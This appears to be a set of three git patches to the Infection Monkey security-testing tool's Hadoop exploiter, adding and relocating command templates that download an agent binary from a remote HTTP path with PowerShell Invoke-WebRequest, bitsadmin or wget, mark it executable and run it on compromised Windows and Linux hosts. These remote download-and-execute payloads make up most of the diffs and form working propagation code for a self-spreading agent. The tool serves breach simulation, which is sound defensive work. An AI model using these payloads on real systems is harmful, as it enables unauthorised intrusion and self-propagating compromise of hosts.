From 5ffd22433aec5ae96450b4955d1275a23613808b Mon Sep 17 00:00:00 2001
From: VakarisZ <vakarisz@yahoo.com>
Date: Wed, 21 Nov 2018 13:32:45 +0200
Subject: [PATCH 1/3] Hadoop windows fixed to be more reliable

---
 monkey/infection_monkey/exploit/hadoop.py | 12 ++++++++++++
 1 file changed, 12 insertions(+)

diff --git a/monkey/infection_monkey/exploit/hadoop.py b/monkey/infection_monkey/exploit/hadoop.py
index 0605614ee..6c0180fb0 100644
--- a/monkey/infection_monkey/exploit/hadoop.py
+++ b/monkey/infection_monkey/exploit/hadoop.py
@@ -29,9 +29,18 @@ class HadoopExploiter(WebRCE):
                     "&& wget -O %(monkey_path)s %(http_path)s " \
                     "; chmod +x %(monkey_path)s " \
                     "&&  %(monkey_path)s %(monkey_type)s %(parameters)s"
+
+    """ Command was observed to be unreliable, we use powershell instead
     WINDOWS_COMMAND = "cmd /c if NOT exist %(monkey_path)s bitsadmin /transfer" \
                       " Update /download /priority high %(http_path)s %(monkey_path)s " \
                       "& %(monkey_path)s %(monkey_type)s %(parameters)s"
+    """
+
+    WINDOWS_COMMAND = "powershell -NoLogo -Command \"if (!(Test-Path '%(monkey_path)s')) { " \
+                      "Invoke-WebRequest -Uri '%(http_path)s' -OutFile '%(monkey_path)s' -UseBasicParsing }; " \
+                      " if (! (ps | ? {$_.path -eq '%(monkey_path)s'})) " \
+                      "{& %(monkey_path)s %(monkey_type)s %(parameters)s }  \""
+
     # How long we have our http server open for downloads in seconds
     DOWNLOAD_TIMEOUT = 60
     # Random string's length that's used for creating unique app name
@@ -46,6 +55,9 @@ class HadoopExploiter(WebRCE):
         self.add_vulnerable_urls(urls, True)
         if not self.vulnerable_urls:
             return False
+        # We can only upload 64bit version to windows for various reasons
+        if self.host.os['type'] == 'windows':
+            self.host.os['machine'] = '64'
         paths = self.get_monkey_paths()
         if not paths:
             return False

From b48cb16088d4191e776ed8911f8374ac9d545a94 Mon Sep 17 00:00:00 2001
From: VakarisZ <vakarisz@yahoo.com>
Date: Thu, 22 Nov 2018 19:45:13 +0200
Subject: [PATCH 2/3] Comment changed

---
 monkey/infection_monkey/exploit/hadoop.py | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/monkey/infection_monkey/exploit/hadoop.py b/monkey/infection_monkey/exploit/hadoop.py
index 6c0180fb0..30925bc0f 100644
--- a/monkey/infection_monkey/exploit/hadoop.py
+++ b/monkey/infection_monkey/exploit/hadoop.py
@@ -55,7 +55,7 @@ class HadoopExploiter(WebRCE):
         self.add_vulnerable_urls(urls, True)
         if not self.vulnerable_urls:
             return False
-        # We can only upload 64bit version to windows for various reasons
+        # We assume hadoop is ran only on 64 bit windows
         if self.host.os['type'] == 'windows':
             self.host.os['machine'] = '64'
         paths = self.get_monkey_paths()

From db5e5eb45339b4c408da1c9a40b310c9c3f5aa75 Mon Sep 17 00:00:00 2001
From: VakarisZ <vakarisz@yahoo.com>
Date: Thu, 29 Nov 2018 17:43:09 +0200
Subject: [PATCH 3/3] Commands moved to model

---
 monkey/infection_monkey/exploit/hadoop.py | 28 +++--------------------
 monkey/infection_monkey/model/__init__.py | 12 +++++++++-
 2 files changed, 14 insertions(+), 26 deletions(-)

diff --git a/monkey/infection_monkey/exploit/hadoop.py b/monkey/infection_monkey/exploit/hadoop.py
index 30925bc0f..881ccf39d 100644
--- a/monkey/infection_monkey/exploit/hadoop.py
+++ b/monkey/infection_monkey/exploit/hadoop.py
@@ -12,7 +12,7 @@ import posixpath
 
 from infection_monkey.exploit.web_rce import WebRCE
 from infection_monkey.exploit.tools import HTTPTools, build_monkey_commandline, get_monkey_depth
-from infection_monkey.model import MONKEY_ARG, ID_STRING
+from infection_monkey.model import MONKEY_ARG, ID_STRING, HADOOP_WINDOWS_COMMAND, HADOOP_LINUX_COMMAND
 
 __author__ = 'VakarisZ'
 
@@ -22,25 +22,6 @@ LOG = logging.getLogger(__name__)
 class HadoopExploiter(WebRCE):
     _TARGET_OS_TYPE = ['linux', 'windows']
     HADOOP_PORTS = [["8088", False]]
-
-    # We need to prevent from downloading if monkey already exists because hadoop uses multiple threads/nodes
-    # to download monkey at the same time
-    LINUX_COMMAND = "! [ -f %(monkey_path)s ] " \
-                    "&& wget -O %(monkey_path)s %(http_path)s " \
-                    "; chmod +x %(monkey_path)s " \
-                    "&&  %(monkey_path)s %(monkey_type)s %(parameters)s"
-
-    """ Command was observed to be unreliable, we use powershell instead
-    WINDOWS_COMMAND = "cmd /c if NOT exist %(monkey_path)s bitsadmin /transfer" \
-                      " Update /download /priority high %(http_path)s %(monkey_path)s " \
-                      "& %(monkey_path)s %(monkey_type)s %(parameters)s"
-    """
-
-    WINDOWS_COMMAND = "powershell -NoLogo -Command \"if (!(Test-Path '%(monkey_path)s')) { " \
-                      "Invoke-WebRequest -Uri '%(http_path)s' -OutFile '%(monkey_path)s' -UseBasicParsing }; " \
-                      " if (! (ps | ? {$_.path -eq '%(monkey_path)s'})) " \
-                      "{& %(monkey_path)s %(monkey_type)s %(parameters)s }  \""
-
     # How long we have our http server open for downloads in seconds
     DOWNLOAD_TIMEOUT = 60
     # Random string's length that's used for creating unique app name
@@ -55,9 +36,6 @@ class HadoopExploiter(WebRCE):
         self.add_vulnerable_urls(urls, True)
         if not self.vulnerable_urls:
             return False
-        # We assume hadoop is ran only on 64 bit windows
-        if self.host.os['type'] == 'windows':
-            self.host.os['machine'] = '64'
         paths = self.get_monkey_paths()
         if not paths:
             return False
@@ -91,9 +69,9 @@ class HadoopExploiter(WebRCE):
         # Build command to execute
         monkey_cmd = build_monkey_commandline(self.host, get_monkey_depth() - 1)
         if 'linux' in self.host.os['type']:
-            base_command = self.LINUX_COMMAND
+            base_command = HADOOP_LINUX_COMMAND
         else:
-            base_command = self.WINDOWS_COMMAND
+            base_command = HADOOP_WINDOWS_COMMAND
 
         return base_command % {"monkey_path": path, "http_path": http_path,
                                "monkey_type": MONKEY_ARG, "parameters": monkey_cmd}
diff --git a/monkey/infection_monkey/model/__init__.py b/monkey/infection_monkey/model/__init__.py
index f2217623a..35a63f2a2 100644
--- a/monkey/infection_monkey/model/__init__.py
+++ b/monkey/infection_monkey/model/__init__.py
@@ -28,4 +28,14 @@ CHECK_COMMAND = "echo %s" % ID_STRING
 GET_ARCH_WINDOWS = "wmic os get osarchitecture"
 GET_ARCH_LINUX = "lscpu"
 
-DOWNLOAD_TIMEOUT = 300
\ No newline at end of file
+# All in one commands (upload, change permissions, run)
+HADOOP_WINDOWS_COMMAND = "powershell -NoLogo -Command \"if (!(Test-Path '%(monkey_path)s')) { " \
+                      "Invoke-WebRequest -Uri '%(http_path)s' -OutFile '%(monkey_path)s' -UseBasicParsing }; " \
+                      " if (! (ps | ? {$_.path -eq '%(monkey_path)s'})) " \
+                      "{& %(monkey_path)s %(monkey_type)s %(parameters)s }  \""
+HADOOP_LINUX_COMMAND = "! [ -f %(monkey_path)s ] " \
+                    "&& wget -O %(monkey_path)s %(http_path)s " \
+                    "; chmod +x %(monkey_path)s " \
+                    "&&  %(monkey_path)s %(monkey_type)s %(parameters)s"
+
+DOWNLOAD_TIMEOUT = 300